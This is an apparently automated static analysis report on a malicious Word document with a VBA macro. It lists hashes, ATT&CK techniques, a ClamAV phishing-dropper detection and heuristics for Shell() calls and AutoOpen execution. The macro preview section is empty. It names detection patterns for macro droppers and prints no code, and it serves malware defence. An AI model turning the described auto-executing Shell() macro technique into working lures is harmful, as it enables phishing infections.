Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0f716d986545de5…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 213.0 KB
Created: 2017-12-27 19:34:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: c78f532ad5cc9a1c708aef338d934ad2
SHA-1: 20e8bfcbb2247f95699c826e4309a8b447fe9697
SHA-256: c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16
Risk score: 242

Malware Insights

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, which is a critical finding, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0', suggesting a phishing lure designed to drop further malware. The AutoOpen macro and legacy WordBasic markers also point to malicious intent.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   79917 bytes
SHA-256: 3037242db1fae0a8f894a584b846c55486d09af864e69a55e69e9fec849c1a4c
Preview script
First 1,000 lines of the extracted script